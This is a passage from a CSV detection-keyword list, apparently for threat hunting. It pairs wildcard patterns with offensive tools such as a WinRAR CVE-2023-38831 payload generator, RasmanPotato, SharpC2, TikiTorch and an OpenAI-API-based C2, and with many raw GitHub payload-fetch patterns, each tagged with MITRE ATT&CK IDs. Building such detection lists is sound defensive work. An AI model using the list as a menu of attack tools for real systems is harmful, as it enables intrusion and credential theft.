Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*rar2john.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*rarce *.pdf *.rar*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,0,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*rarce *.rar*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,0,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*rarce-1.0.0.tar.gz*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,1,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*rarce-1.0.0-py3-none-any.whl*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,1,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*rasman*whoami*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege 
Escalation,https://github.com/crisprss/RasmanPotato,1,1,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*RasMan.cpp*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,1,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*RasMan.sln*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,0,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*RasMan.vcxproj*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,0,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*rasman_c.c*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,0,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*rasman_h.h*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,0,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*RasmanPotato-master*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,1,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*rasta-mouse*,offensive_tool_keyword,Github Username,github user author of various offensive tools,N/A,N/A,N/A,N/A,Exploitation 
tools,https://github.com/rasta-mouse,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*rasta-mouse/PPEnum*,offensive_tool_keyword,cobaltstrike,Simple BOF to read the protection level of a process,T1012,TA0007,N/A,N/A,Reconnaissance,https://github.com/rasta-mouse/PPEnum,1,1,N/A,N/A,1,90,7,2023-05-10T16:41:09Z,2023-05-10T16:38:36Z -*rasta-mouse/RuralBishop*,offensive_tool_keyword,RuralBishop,creates a local RW section in UrbanBishop and then maps that section as RX into a remote process,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004,TA0005 - TA0003 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/RuralBishop,1,1,N/A,10,2,101,28,2020-07-19T18:47:44Z,2020-07-19T18:47:38Z -*rasta-mouse/SharpC2*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*rasta-mouse/ThreatCheck*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,1,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*rasta-mouse/TikiTorch*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*ratchatPT*/bin/bash*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,0,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*RatChatPT.exe*,offensive_tool_keyword,ratchatgpt,ratchatpt a tool using openai api as a C2,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,N/A,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*RatChatPT.exe*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*RatChatPT_windows.exe*,offensive_tool_keyword,ratchatgpt,ratchatpt a tool using openai api as a C2,T1094 - 
T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,N/A,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*RatChatPT_windows.exe*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*ratchatpt-main*,offensive_tool_keyword,ratchatgpt,ratchatpt a tool using openai api as a C2,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,0,N/A,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*ratchatpt-main*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*raw*/straight-shooter.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*raw.githubusercontent.com*.7z*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.apk*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.app*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A 
-*raw.githubusercontent.com*.as*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.asc*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.asp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.bash*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.bat*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.beacon*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.bin*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.bpl*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False 
positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.c*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.cer*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.cmd*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.com*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.cpp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.crt*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.cs*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.csh*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware 
tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.dat*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.dll*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.docm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.dos*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.exe*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.go*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.gz*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.hta*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve 
payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.iso*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.jar*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.js*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.lnk*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.log*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.mac*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.mam*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.msi*,greyware_tool_keyword,github,Github raw access content - abused 
by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.msp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.nexe*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.nim*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.otm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.out*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.ova*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.pem*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.pfx*,greyware_tool_keyword,github,Github 
raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.pl*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.plx*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.pm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.ppk*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.ps1*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.psm1*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.pub*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A 
-*raw.githubusercontent.com*.py*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.pyc*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.pyo*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.rar*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.raw*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.reg*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.rgs*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.RGS*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive 
!,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.run*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.scpt*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.script*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.sct*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.sh*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.ssh*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.sys*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.teamserver*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve 
payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.temp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.tgz*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.tmp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.vb*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.vbs*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.vbscript*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.ws*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.wsf*,greyware_tool_keyword,github,Github raw access content - 
abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.wsh*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.X86*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.X86_64*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.xlam*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.xlm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.xlsm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.zip*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve 